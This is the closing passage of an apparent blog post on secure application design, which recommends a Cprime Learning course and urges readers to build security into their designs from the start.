While these principles aren’t magic, this is still a pretty high-level view. If you’re interested in learning more about designing secure applications, Cprime Learning provides an intensive course that goes into much more detail. If you’re thinking about starting a new application design, this course is a great idea. Many companies find security challenging because they’re unprepared when designing their application. They bake that insecurity into their application. By the time they realize they have a problem, a fix is costly and difficult. Instead, follow the principles laid out here. Learn more about them, and seek to spot them in your application designs. When you do, you’ll improve what you deliver. Your company and your customers will thank you for it!
